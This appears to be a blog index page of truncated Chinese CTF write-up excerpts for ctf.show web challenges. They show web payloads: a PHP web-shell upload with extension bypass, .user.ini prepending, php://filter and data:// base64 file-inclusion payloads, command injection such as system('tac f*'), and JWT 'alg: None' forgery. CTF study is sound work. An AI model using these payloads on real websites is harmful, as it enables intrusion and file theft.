web151 0x01 测试了一下需要png结尾,传个一句话木马上传之后bp抓包改为php,然后执行就行了，或者蚁剑 0x02 前端js进行修改，把对应的png改成php即可 web152 参照web151的0x01 web153 这题直接改结尾不能成功，尝试htaccess之后发现不行，查阅之后发现前者只适合apache,这里使.user.ini 12GIF89aauto_prepe

web89 1?num[]=a web90 0x01 1?num=4476.11 0x02 1?num=+4476 0x03 1?num=4476e1 0x04 1?num=0x117c web91 1?cmd=%0aphp web92 0x01 1?num=4476.11 0x02 1?num=4476e1 web92 0x01 1?num=4476.11 0x02 1

前言:炒冷饭也不失一种乐趣。 web78 1?file=php://filter/convert.base64-encode/resource=flag.php web79 1?file=data://text/plain;base64,PD9waHAgCnN5c3RlbSgidGFjIGZsYWcucGhwIikKPz4= 原理就是将`进行base64写进去执行 web80 0x01 1

前言:用了几天晚上时间把题目都过了一下，还是有值得学习的地方，炒冷饭也不失一种乐趣。web119-122的题目由于直接上传原文会对hexo的渲染模板可能造成模板注入，所以迫不得已上传的png web29 0x01 1?c=system("tac f*"); 0x02 1?c=echo `tac f*`; web30 1?c=echo `tac f*`; web31 1

题目 web345 打开查看页面源码提示/admin/，抓包看看有没有东西，发现是jwt，放jwt.io里看一下没有加密方式，那就是简单的base64进行转化，这里利用hackerbar进行发包 1{"alg":"None","typ":"jwt"}[{"iss":

题目 在线靶场 一个生成的网站，有提示需要买到Lv6，然后就没有然后了 分析 下面有很多Lv2-Lv5的，可以尝试写个脚本找到网页 点击图片看名称，src="/static/img/lv/lv3.png"写脚本爆一下看看哪页有lv6.png的内容 12345678import requestsurl = "http://c66eb3e7-b146-49bb-b9c

题目 在线靶场 1234567891011121314151617181920212223242526272829303132 <?php highlight_file(__FILE__);error_reporting(0);function substrstr($data){ $start = mb_strpos($data, "["); $e

前言：😋，看到好友包师傅每日一题，我也打算开个每日一题，记录一下内容。 题目 [在线靶场][https://ctf.show/challenges#Unzip-4002] 初始界面是一个文件上传，随手上传一个一句话木马，进入页面。 12345678910 <?phperror_reporting(0);highlight_file(__FILE__);$finfo = finfo_ope